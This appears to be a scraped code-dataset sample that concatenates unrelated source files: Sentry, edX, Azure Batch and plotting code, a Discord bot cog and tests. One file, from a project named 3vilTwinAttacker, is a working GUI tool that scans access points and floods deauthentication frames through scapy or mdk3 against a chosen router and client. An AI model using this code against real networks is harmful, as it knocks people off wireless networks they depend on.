if not self.__mute:
print "DesignScript imported under config.libs.DesignScript"
__dynamoPath = "\\".join((clr.References[2].Location).split("\\")[:-1])
sys.path.append(__dynamoPath)
import Dynamo as dyn
except ImportError as e:
print "Failed to import geometry libraries {}".format(e)
else:
# Assign Rhino and Grasshopper to the libraries
self.libs = self._Libs(None, None, dyn, ds)
def __repr__(self):
"""Return platform."""
return "{}".format(self.platform)
# expose platform and libraries as global variables
platform = Platform(mute=False)
platformId = platform.platformId
libs = platform.libs
| antonszilasi/honeybeex | honeybeex/config.py | Python | gpl-3.0 | 5,455 |
from __future__ import absolute_import, print_function
import six
from bitfield import BitField
from datetime import timedelta
from django.db import models, transaction
from django.utils import timezone
from uuid import uuid4
from sentry.models.apiscopes import ApiScopes
from sentry.db.models import (
ArrayField, Model, BaseManager, FlexibleForeignKey, sane_repr
)
DEFAULT_EXPIRATION = timedelta(days=30)
class ApiToken(Model):
__core__ = True
# users can generate tokens without being application-bound
application = FlexibleForeignKey('sentry.ApiApplication', null=True)
user = FlexibleForeignKey('sentry.User')
token = models.CharField(
max_length=64,
unique=True,
default=lambda: ApiToken.generate_token(),
)
refresh_token = models.CharField(
max_length=64,
unique=True,
null=True,
default=lambda: ApiToken.generate_token(),
)
expires_at = models.DateTimeField(
null=True, default=lambda: timezone.now() + DEFAULT_EXPIRATION
)
scopes = BitField(flags=ApiScopes().to_bitfield())
scope_list = ArrayField(of=models.TextField)
date_added = models.DateTimeField(default=timezone.now)
objects = BaseManager(cache_fields=('token', ))
class Meta:
app_label = 'sentry'
db_table = 'sentry_apitoken'
__repr__ = sane_repr('user_id', 'token', 'application_id')
def __unicode__(self):
return six.text_type(self.token)
@classmethod
def generate_token(cls):
return uuid4().hex + uuid4().hex
@classmethod
def from_grant(cls, grant):
with transaction.atomic():
return cls.objects.create(
application=grant.application,
user=grant.user,
scope_list=grant.get_scopes(),
)
def is_expired(self):
if not self.expires_at:
return False
return timezone.now() >= self.expires_at
def get_audit_log_data(self):
return {
'scopes': self.get_scopes(),
}
def get_scopes(self):
if self.scope_list:
return self.scope_list
return [k for k, v in six.iteritems(self.scopes) if v]
def has_scope(self, scope):
return scope in self.get_scopes()
def get_allowed_origins(self):
if self.application:
return self.application.get_allowed_origins()
return ()
def refresh(self, expires_at=None):
if expires_at is None:
expires_at = timezone.now() + DEFAULT_EXPIRATION
self.update(
token=type(self).generate_token(),
refresh_token=type(self).generate_token(),
expires_at=expires_at,
)
| looker/sentry | src/sentry/models/apitoken.py | Python | bsd-3-clause | 2,742 |
"""
Message Types for user_api emails
"""
from django.conf import settings
from openedx.core.djangoapps.ace_common.message import BaseMessageType
from openedx.core.djangoapps.site_configuration import helpers
class DeletionNotificationMessage(BaseMessageType):
"""
Message to notify learners that their account is queued for deletion.
"""
def __init__(self, *args, **kwargs):
super(DeletionNotificationMessage, self).__init__(*args, **kwargs) # lint-amnesty, pylint: disable=super-with-arguments
self.options['transactional'] = True # pylint: disable=unsupported-assignment-operation
self.options['from_address'] = helpers.get_value( # pylint: disable=unsupported-assignment-operation
'email_from_address', settings.DEFAULT_FROM_EMAIL
)
| stvstnfrd/edx-platform | openedx/core/djangoapps/user_api/message_types.py | Python | agpl-3.0 | 806 |
#! /usr/bin/env python
from ppclass import pp
tsurf = pp()
tsurf.file = "/home/aymeric/Big_Data/DATAPLOT/diagfired.nc"
tsurf.var = "tsurf"
tsurf.x = None
tsurf.y = 10.
tsurf.t = 2.
tsurf.getdefineplot()
ps = pp()
ps << tsurf
ps.var = "ps"
ps.getdefineplot()
S = ps.func(tsurf)
S.p[0].linestyle=""
S.p[0].marker="h"
S.p[0].color="g"
S.makeplot()
icetot = pp()
icetot << tsurf
icetot.var = "icetot"
icetot.getdefineplot()
S2 = icetot.func(tsurf)
S2.p[0].linestyle=""
S2.p[0].marker="D"
S2.p[0].color="r"
S2.makeplot()
u = pp()
u << tsurf
u.var = "u"
u.z = 1.
u.get()
v = pp()
v << u
v.var = "v"
v.get()
wind = u**2 + v**2
wind = wind**0.5
S3 = wind.func(ps)
S3.p[0].linestyle=""
S3.p[0].marker="o"
S3.p[0].color="k"
S3.p[0].ylabel="wind speed $\sqrt{u^{2}+v^{2}}$ (m s$^{-1}$)"
S3.filename="scatter"
S3.makeplot()
## multidim scatter also possible
## the important thing is forcedimplot
tsurf = pp()
tsurf.file = "/home/aymeric/Big_Data/DATAPLOT/diagfired.nc"
tsurf.var = "tsurf"
tsurf.x = None
tsurf.y = None
tsurf.t = 2.
tsurf.forcedimplot = 1
tsurf.getdefineplot()
ps = pp()
ps << tsurf
ps.var = "ps"
ps.getdefineplot()
S = ps.func(tsurf)
S.p[0].linestyle=""
S.p[0].marker="h"
S.p[0].color="g"
S.makeplot()
| aymeric-spiga/planetoplot | examples/ppclass_reference/scatter.py | Python | gpl-2.0 | 1,220 |
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2017 SML
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from collections import defaultdict
import discord
import os
from discord import InvalidArgument, Forbidden, HTTPException
from discord.ext import commands
import argparse
from cogs.utils import checks
from cogs.utils.dataIO import dataIO
PATH = os.path.join("data", "channelmanager")
JSON = os.path.join(PATH, "settings.json")
def nested_dict():
"""Recursively nested defaultdict."""
return defaultdict(nested_dict)
def channel_edit_parser():
"""Process edit channel arguments."""
# Process arguments
parser = argparse.ArgumentParser(prog='[p]chm edit')
# parser.add_argument('key')
parser.add_argument(
'-r', '--roles',
nargs='+',
help='Roles to apply permissions to')
parser.add_argument(
'-c', '--channels',
nargs='+',
help='List of channels separated by space'
)
parser.add_argument(
'-p', '--permissions',
nargs='+',
help='List of permitted permissions'
)
return parser
class ChannelManager:
"""Channel Manager."""
def __init__(self, bot):
"""Init."""
self.bot = bot
self.settings = nested_dict()
self.settings.update(dataIO.load_json(JSON))
@commands.group(aliases=['chm'], pass_context=True)
@checks.mod_or_permissions()
async def channelman(self, ctx):
"""Channel Manager."""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
@channelman.group(pass_context=True, no_pm=True)
@checks.mod_or_permissions(manage_channels=True)
async def create(self, ctx):
"""Create Channel."""
if ctx.invoked_subcommand is None or isinstance(ctx.invoked_subcommand, commands.Group):
await self.bot.send_cmd_help(ctx)
@create.command(name="user", pass_context=True, no_pm=True)
@checks.mod_or_permissions(manage_channels=True)
async def create_user(self, ctx, name, user: discord.Member, after: discord.Channel = None):
"""User specific channel.
Everyone can read but only one person can write.
"""
server = ctx.message.server
channel = await self.bot.create_channel(
server,
name,
discord.ChannelPermissions(
target=server.default_role,
overwrite=discord.PermissionOverwrite(
read_messages=True,
send_messages=False
)
),
discord.ChannelPermissions(
target=user,
overwrite=discord.PermissionOverwrite(
send_messages=True
)
),
type=discord.ChannelType.text
)
await self.bot.say("Channel created: {}".format(channel))
@channelman.group(pass_context=True, no_pm=True)
@checks.mod_or_permissions(manage_channels=True)
async def move(self, ctx):
"""Move channel."""
if ctx.invoked_subcommand is None or isinstance(ctx.invoked_subcommand, commands.Group):
await self.bot.send_cmd_help(ctx)
@move.command(name="after", pass_context=True, no_pm=True)
@checks.mod_or_permissions(manage_channels=True)
async def move_after(self, ctx, channel: discord.Channel, after_channel: discord.Channel):
"""Move channel after a channel."""
try:
await self.bot.move_channel(channel, after_channel.position + 1)
await self.bot.say("Channel moved.")
except (InvalidArgument, Forbidden, HTTPException) as err:
await self.bot.say("Move channel failed. " + str(err))
@channelman.command(pass_context=True, no_pm=True)
@checks.mod_or_permissions(manage_channel=True)
async def edit(self, ctx, *args):
"""Edit channel permissions.
-r role
-c channels to apply to, separated by space
-p permissions to apply
Permissions:
read_messages=1
send_messages=0
manage_messages=1
read_message_history
"""
parser = channel_edit_parser()
try:
pargs = parser.parse_args(args)
except SystemExit:
await self.bot.send_cmd_help(ctx)
return
channels = pargs.channels
roles = pargs.roles
permissions = pargs.permissions
server = ctx.message.server
overwrite = discord.PermissionOverwrite()
for perm in permissions:
p = perm.split('=')
name = p[0]
value = p[1] == '1'
setattr(overwrite, name, value)
c_list = []
r_list = []
for role in roles:
r = discord.utils.get(server.roles, name=role)
if r:
r_list.append(r)
for channel in channels:
c = discord.utils.get(server.channels, name=channel)
if c:
c_list.append(c)
for c in c_list:
for r in r_list:
await self.bot.edit_channel_permissions(c, r, overwrite)
await self.bot.say(
"Permissions updated for {} for {}".format(
", ".join([c.name for c in c_list]),
", ".join([r.name for r in r_list])
)
)
await self.bot.say(
"{}\n{}\n{}".format(
", ".join(channels),
", ".join(roles),
", ".join(permissions)
)
)
def check_folder():
"""Check folder."""
os.makedirs(PATH, exist_ok=True)
def check_file():
"""Check files."""
if not dataIO.is_valid_json(JSON):
dataIO.save_json(JSON, {})
def setup(bot):
"""Setup."""
check_folder()
check_file()
n = ChannelManager(bot)
bot.add_cog(n)
| smlbiobot/SML-Cogs | channelmanager/channelmanager.py | Python | mit | 6,880 |
#-------------------------------------------------------------------------
# The Azure Batch Apps Python Client
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#--------------------------------------------------------------------------
"""
A sample script showing use of the batchapps module to construct and submit
an arbitrary job.
"""
import getpass
import sys
import webbrowser
from batchapps import (
FileManager,
JobManager,
Credentials,
Configuration)
from batchapps.credentials import AzureOAuth
from batchapps.exceptions import (
AuthenticationException,
RestCallException,
InvalidConfigException)
LOG_LEVEL = "debug"
ASSET_DIR = "//Path/To/Assets/Directory"
# These settings will be specific to a users Batch Apps service.
ENDPOINT = "myservice.batchapps.core.windows.net"
ACCOUNT_ID = "ClientID=abcd-1234-efgh-5678;TenantID=wxzy-8765-tuv-4321"
ACCOUNT_KEY = "********"
def authentication(mode):
"""
Authenticates a username against a stored password, if any, otherwise
requires a password is to be entered.
:Args:
- cfg (:class:`.Configuration`): an instance of class Configuration as
returned by create_config()
:Returns:
- a :class:`.Credentials` instance object
"""
try:
return AzureOAuth.get_unattended_session(config=mode)
except (AuthenticationException, InvalidConfigException) as e:
print("Could not get unattended session: {0}".format(e))
try:
auth_url = AzureOAuth.get_authorization_url(config=mode)[0]
webbrowser.open(auth_url)
redirect_url = input("Please enter authentication url: ")
return AzureOAuth.get_authorization_token(redirect_url,
config=mode)
except (AuthenticationException, InvalidConfigException) as e:
raise RuntimeError("Failed to authenticate: {0}".format(e))
def create_config():
"""
Looks for configuration settings for specified application, otherwise
creates new configuration, sets chosen log_level.
:Returns:
- a :class:`.Configuration` instance object
"""
global LOG_LEVEL
if input("Run in debug mode? (yes/no)")[0].lower() == 'n':
LOG_LEVEL = "info"
try:
# Look for application in existing config file
config = Configuration(log_level=LOG_LEVEL, jobtype="MyApp")
print("Config found.")
return config
except InvalidConfigException:
print("Valid config not found. Attempting to create new config.")
try:
config = Configuration(log_level=LOG_LEVEL)
config.aad_config(endpoint=ENDPOINT,
account=ACCOUNT_ID,
key=ACCOUNT_KEY,
unattended=True)
config.add_jobtype("MyApp")
config.current_jobtype("MyApp")
# Examples of default config settings for your job
config.set("width", "500")
config.set("height", "500")
# Set MyApp to be the default job type
config.set_default_jobtype()
except InvalidConfigException as e:
raise RuntimeError("Invalid Configuration: {0}".format(e))
finally:
config.save_config()
return config
def submit_job(auth, config):
"""
Create a new job submission and send it to the cloud.
:Args:
- auth :class:`.Credentials`: instance of the Credentials
class as returned by authentication()
- config :class:`.Configuration`: instance of the Configuration
class as returned by create_config()
"""
asset_mgr = FileManager(auth, cfg=config)
job_mgr = JobManager(auth, cfg=config)
# Converts directory contents to a FileCollection
file_collection = asset_mgr.files_from_dir(ASSET_DIR)
new_job = job_mgr.create_job("Test Job", files=file_collection)
# Set various job parameters. The pre-configured parameters for the
# job type can be found using new_job.get_default_params().
new_job.instances = 5 # Number of machines to work on the job.
new_job.start = 1
new_job.end = 10
new_job.numFrames = 10
# This sets the file that will be run to start the job.
# In this case the first file in the FileCollection.
new_job.set_job_file(file_collection[0])
# Upload all files needed for the job.
new_job.required_files.upload(threads=4)
try:
submission = new_job.submit()
print("New job submitted with ID: {0}".format(submission['jobId']))
except RestCallException as e:
print("Job failed: {0}".format(e))
if __name__ == "__main__":
try:
cfg = create_config()
creds = authentication(cfg)
submit_job(creds, cfg)
except RuntimeError as exp:
print("Job failed: {0}".format(exp))
| Azure/azure-batch-apps-python | samples/BatchAppsExample-submit_job.py | Python | mit | 5,961 |
# Copyright 2018 The Exoplanet ML Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the Python wrapping of bin_by_phase.h."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import numpy as np
from box_least_squares.python import bin_by_phase
class BinByPhaseTest(absltest.TestCase):
def testEmptyTimeVector(self):
with self.assertRaises(ValueError):
bin_by_phase.bin_by_phase(time=[], values=[1, 2, 3], period=1, nbins=5)
def testDifferentSizeVectors(self):
with self.assertRaises(ValueError):
bin_by_phase.bin_by_phase(
time=[1, 2, 3, 4], values=[11, 22, 33, 44, 55], period=1, nbins=5)
def testNonPositivePeriod(self):
with self.assertRaises(ValueError):
bin_by_phase.bin_by_phase(
time=[1, 2, 3, 4, 5], values=[11, 22, 33, 44, 55], period=0, nbins=5)
def testNonPositiveNbins(self):
with self.assertRaises(ValueError):
bin_by_phase.bin_by_phase(
time=[1, 2, 3, 4, 5], values=[11, 22, 33, 44, 55], period=0, nbins=-1)
def testBinByPhase(self):
time = np.array(
[
0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3,
1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4
],
dtype=np.float)
values = np.array(
[
-12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5,
6, 7, 8, 9, 10, 11, 12
],
dtype=np.float)
# If bin width (period / nbins) exactly divides (t mod period) then the
# bin index may be one less than expected due to floating point arithmetic.
# To ensure the bin indices are computed as expected, add a small offset to
# the time values.
time += 1e-10
# Period larger than time range.
binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
time, values, period=5, nbins=5)
np.testing.assert_almost_equal(binned_values, [-75, 25, 50, 0, 0])
np.testing.assert_almost_equal(binned_square_values, [645, 145, 510, 0, 0])
np.testing.assert_almost_equal(bin_counts, [10, 10, 5, 0, 0])
# Period equal to time range.
binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
time, values, period=2.5, nbins=5)
np.testing.assert_almost_equal(binned_values, [-50, -25, 0, 25, 50])
np.testing.assert_almost_equal(binned_square_values,
[510, 135, 10, 135, 510])
np.testing.assert_almost_equal(bin_counts, [5, 5, 5, 5, 5])
# Period smaller than time range.
binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
time, values, period=0.5, nbins=5)
np.testing.assert_almost_equal(binned_values, [-10, -5, 0, 5, 10])
np.testing.assert_almost_equal(binned_square_values,
[270, 255, 250, 255, 270])
np.testing.assert_almost_equal(bin_counts, [5, 5, 5, 5, 5])
# All values in the first or third bin.
binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
time, values, period=0.2, nbins=5)
np.testing.assert_almost_equal(binned_values, [0, 0, 0, 0, 0])
np.testing.assert_almost_equal(binned_square_values, [728, 0, 572, 0, 0])
np.testing.assert_almost_equal(bin_counts, [13, 0, 12, 0, 0])
# All values in the first bin.
binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
time, values, period=0.1, nbins=5)
np.testing.assert_almost_equal(binned_values, [0, 0, 0, 0, 0])
np.testing.assert_almost_equal(binned_square_values, [1300, 0, 0, 0, 0])
np.testing.assert_almost_equal(bin_counts, [25, 0, 0, 0, 0])
# Values distributed.
binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
time, values, period=0.14159, nbins=5)
np.testing.assert_almost_equal(binned_values, [-9, 6, 3, -10, 10])
np.testing.assert_almost_equal(binned_square_values,
[319, 182, 307, 174, 318])
np.testing.assert_almost_equal(bin_counts, [6, 4, 6, 4, 5])
if __name__ == "__main__":
absltest.main()
| google-research/exoplanet-ml | exoplanet-ml/box_least_squares/python/bin_by_phase_test.py | Python | apache-2.0 | 4,734 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from subprocess import Popen,PIPE
from scapy.all import *
from Dns_Func import frm_dhcp_Attack
import threading
from os import popen,system,getuid,path,makedirs
from re import search,compile,match
from Core.Settings import frm_Settings
from Modules.fuc_airodump import airdump_start,get_network_scan
class frm_window(QMainWindow):
def __init__(self, parent=None):
super(frm_window, self).__init__(parent)
self.form_widget = frm_deauth(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Deauth Attack wireless Route")
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'About Exit',"Are you sure to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
system("airmon-ng stop mon0")
system("clear")
self.deleteLater()
else:
pass
else:
event.ignore()
class frm_deauth(QWidget):
def __init__(self, parent=None):
super(frm_deauth, self).__init__(parent)
self.Main = QVBoxLayout()
self.interface = "mon0"
self.xmlcheck = frm_Settings()
self.ap_list = []
self.pacote = []
self.control = None
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
self.window_qt()
def select_target(self):
item = self.tables.selectedItems()
if item != []:
self.linetarget.setText(item[2].text())
else:
QMessageBox.critical(self, "Error in row", "Nothing row in tables, please try scan network again")
self.linetarget.clear()
def window_qt(self):
self.controlador = QLabel("")
self.attack_OFF()
self.form0 = QFormLayout()
self.form1 = QFormLayout()
self.form2 = QFormLayout()
self.list = QListWidget()
self.list.clicked.connect(self.list_clicked)
self.list.setFixedHeight(20)
self.tables = QTableWidget(5,3)
self.tables.setFixedWidth(350)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.select_target)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,60)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.linetarget = QLineEdit()
self.input_client = QLineEdit(self)
self.input_client.setText("FF:FF:FF:FF:FF:FF")
self.btn_enviar = QPushButton("Send Attack", self)
self.btn_enviar.clicked.connect(self.attack_deauth)
self.btn_scan = QPushButton(" Network Scan ", self)
self.btn_scan.clicked.connect(self.exec_sniff)
self.btn_stop = QPushButton("Stop Attack ", self)
self.btn_stop.clicked.connect(self.kill_thread)
self.btn_enviar.setFixedWidth(170)
self.btn_stop.setFixedWidth(170)
#icons
self.btn_scan.setIcon(QIcon("rsc/network.png"))
self.btn_enviar.setIcon(QIcon("rsc/start.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.w_pacote = QComboBox(self)
self.w_pacote.addItem("1000 ")
self.w_pacote.addItem("2000 ")
self.w_pacote.addItem("3000 ")
self.w_pacote.addItem("4000 ")
self.w_pacote.addItem("5000 ")
self.w_pacote.addItem("10000 ")
self.w_pacote.addItem("infinite loop")
self.time_scan = QComboBox(self)
self.time_scan.addItem("10s")
self.time_scan.addItem("20s")
self.time_scan.addItem("30s")
self.get_placa = QComboBox(self)
Interfaces = frm_dhcp_Attack()
n = Interfaces.placa()
for i,j in enumerate(n):
if search("wlan", j):
self.get_placa.addItem(n[i])
self.form0.addRow("Network scan time:", self.time_scan)
self.form1.addRow(self.tables)
self.form1.addRow(self.get_placa, self.btn_scan)
self.form1.addRow("Target:", self.linetarget)
self.form1.addRow("Packet:",self.w_pacote)
self.form1.addRow("Client:", self.input_client)
self.form1.addRow("Status Attack:", self.controlador)
self.form2.addRow(self.btn_enviar, self.btn_stop)
self.Main.addLayout(self.form0)
self.Main.addLayout(self.form1)
self.Main.addLayout(self.form2)
self.setLayout(self.Main)
def scan_diveces_airodump(self):
dirpath = "Settings/Dump"
if not path.isdir(dirpath):
makedirs(dirpath)
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
exit_air = airdump_start()
self.fix = False
if exit_air == None:
self.cap = get_network_scan()
if self.cap != None:
for i in self.cap:
i = i.split("||")
if self.check_is_mac(i[2]):
Headers = []
self.data['Channel'].append(i[0])
self.data['Essid'].append(i[1])
self.data['Bssid'].append(i[2])
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
self.cap =[]
def kill_thread(self):
self.attack_OFF()
self.control = 1
dat = self.xmlcheck.xmlSettings("item1","deauth_mdk3",None,False)
if dat == "True":
popen("killall xterm")
def exec_sniff(self):
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
dot =1
count = 0
self.options_scan = self.xmlcheck.xmlSettings("monitor0", "scan_scapy", None, False)
if self.get_placa.currentText() == "":
QMessageBox.information(self, "Network Adapter", 'Network Adapter Not found try again.')
else:
comando = "ifconfig"
proc = Popen(comando,stdout=PIPE, shell=False)
data = proc.communicate()[0]
if search("mon0", data):
dot = 0
c = "airmon-ng stop mon0".split()
Popen(c,stdout=PIPE, shell=False)
system("airmon-ng start %s" %(self.get_placa.currentText()))
else:
system("airmon-ng start %s" %(self.get_placa.currentText()))
if self.time_scan.currentText() == "10s":
count = 10
elif self.time_scan.currentText() == "20s":
count = 20
elif self.time_scan.currentText() == "30s":
count = 30
if self.options_scan == "True":
sniff(iface=self.interface, prn =self.Scanner_devices, timeout=count)
t = len(self.ap_list) -1
i = 0
items = []
cap = []
for i in range(t):
if len(self.ap_list[i]) < len(self.ap_list[i+1]):
if i != 0:
for index in xrange(self.list.count()):
items.append(self.list.item(index))
if self.ap_list[i] or self.ap_list[i+1] in items:
pass
else:
self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
else:
self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
else:
self.list.addItem(self.ap_list[i+1] + " " + self.ap_list[i])
if not (self.ap_list[i+1] + " " + self.ap_list[i]) in cap:
cap.append(self.ap_list[i+1] + " " + self.ap_list[i])
if self.ap_list[i] < i:
pass
break
else:
dot = 1
self.list.clear()
for i in cap:
dat = i.split()
if self.check_is_mac(dat[3]):
self.data['Channel'].append(dat[0])
self.data['Essid'].append(dat[2])
self.data['Bssid'].append(dat[3])
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
cap = []
self.ap_list = []
else:
self.thread_airodump = threading.Thread(target=self.scan_diveces_airodump)
self.thread_airodump.daemon = True
self.thread_airodump.start()
def Scanner_devices(self,pkt):
if pkt.type == 0 and pkt.subtype == 8:
if pkt.addr2 not in self.ap_list:
self.ap_list.append(pkt.addr2)
self.ap_list.append(str(int(ord(pkt[Dot11Elt:3].info)))+" | " + pkt.info)
print "AP MAC: %s with SSID: %s CH %d"%(pkt.addr2, pkt.info, int(ord(pkt[Dot11Elt:3].info)))
def attack_deauth(self):
if self.linetarget.text() == "":
QMessageBox.information(self, "Target Error", "Please, first select Target for attack")
else:
self.ss = None
if self.w_pacote.currentText() == "infinite loop":
self.ss = 1
else:
self.ss = int(self.w_pacote.currentText())
self.bssid = str(self.linetarget.text())
self.deauth_check = self.xmlcheck.xmlSettings("item0", "deauth_scapy",None,False)
self.args = self.xmlcheck.xmlSettings("mdk3","arguments", None, False)
if self.deauth_check == "True":
self.controlador.setText("[ ON ]")
self.controlador.setStyleSheet("QLabel { color : green; }")
self.t = threading.Thread(target=self.deauth_attacker, args=(self.bssid,str(self.input_client.text()), self.ss))
self.t.daemon = True
self.t.start()
else:
self.controlador.setText("[ ON ]")
self.controlador.setStyleSheet("QLabel { color : green; }")
self.t = threading.Thread(target=self.mdk3_attacker, args=(self.bssid,self.args,))
self.t.daemon = True
self.t.start()
def attack_OFF(self):
self.controlador.setText("[ OFF ]")
self.controlador.setStyleSheet("QLabel { color : red; }")
system("clear")
def mdk3_attacker(self,bssid,args):
n = (popen("""sudo xterm -geometry 75x15-1+200 -T "mdk3 Target: %s" -e mdk3 mon0 %s %s & mdk3=$!"""%(bssid,args,bssid)).read()) + "exit"
while n != "dsa":
if n == "exit":
self.attack_OFF()
break
def deauth_attacker(self,bssid, client, count):
self.control = None
bot = 0
conf.verb = 0
conf.iface = self.interface
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
deauth_ap = Dot11(addr1=bssid, addr2=bssid, addr3=bssid)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=bssid, addr2=client, addr3=client)/Dot11Deauth()
self.pacote.append(deauth_pkt2)
self.pacote.append(deauth_ap)
if count == 1:
while count != 0:
try:
sendp(packet)
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
if self.control == None:
pass
else:
self.attack_OFF()
count = 0
popen("clear")
except KeyboardInterrupt:
print "::"
sys.exit()
else:
for n in range(int(count)):
try:
sendp(packet)
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
if self.control == None:
pass
else:
self.attack_OFF()
popen("clear")
break
except KeyboardInterrupt:
print "::"
sys.exit()
self.attack_OFF()
def check_is_mac(self,value):
checked = re.compile(r"""(
^([0-9A-F]{2}[-]){5}([0-9A-F]{2})$
|^([0-9A-F]{2}[:]){5}([0-9A-F]{2})$
)""",
re.VERBOSE|re.IGNORECASE)
if checked.match(value) is None:
return False
else:
return True
@pyqtSlot(QModelIndex)
def list_clicked(self, index):
itms = self.list.selectedIndexes()
for i in itms:
attack = str(i.data().toString()).split()
for i in attack:
if self.check_is_mac(i.replace(" ", "")):
self.linetarget.setText(str(i))
if self.linetarget.text() == "":
QMessageBox.information(self, "MacAddress", "Error check the Mac Target, please set the mac valid.")
| stevenliuit/3vilTwinAttacker | Modules/deauth_func.py | Python | mit | 15,164 |
'''
Created on Aug 28, 2010
@author: Aaron Cooper
'''
import os
import unittest
import sys
def my_import(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
if __name__ == "__main__":
path = os.path.abspath(os.path.dirname(sys.argv[0]))
files = os.listdir(path + "/unit_tests")
runner = unittest.TextTestRunner();
loader = unittest.TestLoader()
for file in files:
if file.lower().endswith('test.py'):
moduleName = file.split('.')[0]
mod = my_import('unit_tests.' + moduleName)
